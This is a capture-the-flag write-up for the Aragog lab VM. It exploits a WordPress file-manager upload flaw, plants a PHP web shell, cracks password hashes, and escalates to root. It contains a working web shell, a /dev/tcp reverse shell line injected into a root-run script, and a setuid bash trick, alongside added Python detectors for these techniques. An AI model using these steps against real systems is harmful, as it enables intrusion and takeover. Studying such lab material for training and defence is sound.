Aragog

Aragog is the first VM of the 3-box HarryPotter VM series, in which you need to find 2 horcruxes hidden inside the machine.

An nmap scan reveals ports 22 and 80 open.

Gobuster reveals a WordPress blog under /blog.

// wpscan: quick scan first, then plugin enumeration with an API token
wpscan --url http://192.168.1.101/blog

wpscan --api-token=$WPSCAN_KEY --url=http://1.2.3.4/blog -e p --plugins-detection aggressive

The important keywords are highlighted on the blog, so we can guess that there may be vulnerable plugins. Since the site runs WordPress, we use wpscan to dig deeper. Make sure you have a wpscan API token; it is needed to flag known-vulnerable plugins.

// first tried to attack plugin 1
// NO backup files could be found in the /wp-content/uploads/wp-file-manager-pro/fm_backup directory
abandoned this and moved to the next plugin identified by wpscan

// Arbitrary unauthenticated file upload (wp-file-manager)
// link below
https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

Make sure payload.php exists before running the PoC; it ends up under the plugin's lib/files directory:

<?php
system($_GET['cmd']);
?>


wget -c "https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py"
python3 2020-wp-file-manager-v67.py http://wordpress.aragog.hogwarts/blog
 
http://wordpress.aragog.hogwarts/blog/wp-content/plugins/wp-file-manager/lib/files/payload.php?cmd=pwd
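From the defender's side, this chain leaves an obvious trail in the web server's access log. The following Python snippet is an added example, not part of the original writeup or of the PoC script: it parses combined-format log lines and flags PHP being executed from the wp-file-manager upload directory shown above, and cmd= parameters aimed at any PHP file. The sample log lines are constructed for this example; addresses, hostnames and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (only the fields we need).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

PLUGIN_DIR = "/wp-content/plugins/wp-file-manager/"
UPLOAD_DIR = PLUGIN_DIR + "lib/files/"   # where the uploaded payload.php landed above


def classify(line):
    """Return a list of finding dicts for one access-log line (empty if benign/unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["target"])
    path, query = url.path, parse_qs(url.query)
    findings = []
    # Nothing under lib/files/ should ever be served as PHP: that is the upload store.
    if UPLOAD_DIR in path and path.endswith(".php"):
        findings.append(("high", "PHP executed from wp-file-manager upload directory"))
    # A cmd= parameter on a PHP file is the signature of the system($_GET['cmd']) web shell.
    if path.endswith(".php") and "cmd" in query:
        findings.append(("high", "webshell-style cmd parameter: %r" % query["cmd"][0]))
    return [
        {"ip": m["ip"], "ts": m["ts"], "path": path, "severity": sev, "reason": why}
        for sev, why in findings
    ]


def scan_log(text):
    """Run classify() over every line of an access log and collect all findings."""
    out = []
    for line in text.splitlines():
        out.extend(classify(line))
    return out


# Constructed sample log: addresses, hostnames and times are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2021:12:00:01 +0000] "GET /blog/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2021:12:00:04 +0000] "GET /blog/wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1" 200 1800 "-" "python-requests/2.25"
10.0.0.9 - - [10/Mar/2021:12:00:09 +0000] "GET /blog/wp-content/plugins/wp-file-manager/lib/files/payload.php?cmd=pwd HTTP/1.1" 200 31 "-" "curl/7.74"
10.0.0.5 - - [10/Mar/2021:12:00:15 +0000] "GET /blog/wp-login.php HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("[%s] %s %s -> %s" % (f["severity"], f["ip"], f["path"], f["reason"]))
```

Both indicators fire on the third sample line; the readme.txt request under the plugin directory is left alone, so the rule keys on the upload store and the shell parameter rather than on the plugin path as a whole. The fix on the server side is the same regardless of how the log looks: update or remove wp-file-manager and deny PHP execution under wp-content/plugins/wp-file-manager/lib/files/.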

Then upload a PHP reverse shell.

// connect to mysql and view wordpress db
mysql -u root -h localhost -p

show databases;
use wordpress;
show tables;
select * from wp_users;

// cracking the WordPress password hashes (hashcat mode 400 = phpass, the format WordPress uses)
// https://samsclass.info/seminars/CMS/hashcat-wordpress.htm
hashcat -O -m 400 -a 0 -o cracked.txt target_hashes.txt /home/kali/htb/rockyou.txt

ssh hagrid98@192.168.1.101
password123

Using pspy64 to monitor which user executes scripts, we find that root runs /opt/.backup.sh.
Since we can modify the script, we add a reverse shell to it:

sh -i >& /dev/tcp/192.168.1.xx/4444 0>&1

Other method (from the same root-executed script):
cp /bin/bash /tmp/bash && chmod +s /tmp/bash

Basically, the SUID bit lets other users run a binary with the privileges of
its owner. So, in this case we can either execute /tmp/bash as hagrid by simply
running /tmp/bash, or run the same copy as root with /tmp/bash -p: bash drops
an effective UID that differs from the real UID at startup unless -p is given.
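Both weaknesses in this privilege-escalation chain, a root-run script that a low-privileged user can write and a setuid copy of bash in /tmp, are visible from plain stat() data, which is what a hardening check should look at. The Python audit below is an added example and not part of the original writeup: it reports regular files owned by the privileged user that group or others can write, setuid files owned by that user (to compare against a known-good baseline), and setuid files sitting in user-writable trees such as /tmp. audit_mode() works on raw stat fields so it can be tested without root; demo_on_tmpfiles() is a constructed demonstration in a temporary directory that treats the current user as the privileged one.

```python
import os
import stat
import tempfile

ROOT_UID = 0
USER_WRITABLE_TREES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def audit_mode(path, st_mode, st_uid, privileged_uid=ROOT_UID):
    """Pure check on stat fields; returns a list of (path, reason). Regular files only."""
    findings = []
    if not stat.S_ISREG(st_mode):
        return findings
    # /opt/.backup.sh case: root owns and runs it, but others can edit it.
    if st_uid == privileged_uid and st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append((path, "writable by group/others but owned by the privileged user; "
                               "if a root job runs it, anyone who can write it runs code as root"))
    if st_mode & stat.S_ISUID:
        if st_uid == privileged_uid:
            findings.append((path, "setuid file owned by the privileged user; "
                                   "compare against a known-good baseline"))
        # /tmp/bash case: a setuid file outside the usual system directories.
        if path.startswith(USER_WRITABLE_TREES):
            findings.append((path, "setuid file in a user-writable tree; almost certainly planted"))
    return findings


def audit_paths(paths, privileged_uid=ROOT_UID):
    """stat() each path (without following symlinks) and run audit_mode() on it."""
    out = []
    for p in paths:
        try:
            st = os.lstat(p)
        except OSError:
            continue
        out.extend(audit_mode(p, st.st_mode, st.st_uid, privileged_uid))
    return out


def audit_tree(root, privileged_uid=ROOT_UID):
    """Walk a directory tree and audit every file in it."""
    paths = []
    for dirpath, _dirs, files in os.walk(root):
        paths.extend(os.path.join(dirpath, f) for f in files)
    return audit_paths(paths, privileged_uid)


def demo_on_tmpfiles():
    """Constructed demo: a world-writable 'backup' script next to a correctly
    permissioned one, audited with the current user treated as privileged."""
    with tempfile.TemporaryDirectory() as d:
        bad = os.path.join(d, "backup.sh")
        with open(bad, "w") as fh:
            fh.write("#!/bin/bash\n# placeholder backup job\n")
        os.chmod(bad, 0o777)
        good = os.path.join(d, "good.sh")
        with open(good, "w") as fh:
            fh.write("#!/bin/bash\n")
        os.chmod(good, 0o700)
        return audit_tree(d, privileged_uid=os.getuid())


if __name__ == "__main__":
    for path, reason in demo_on_tmpfiles():
        print("%s: %s" % (path, reason))
```

Run audit_tree("/opt") and audit_tree("/tmp") as root on the box to see both findings from this writeup; the remediation is to make /opt/.backup.sh writable by root only (mode 0700 or 0755) and to mount /tmp with nosuid so a planted setuid copy of bash is not honoured in the first place.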
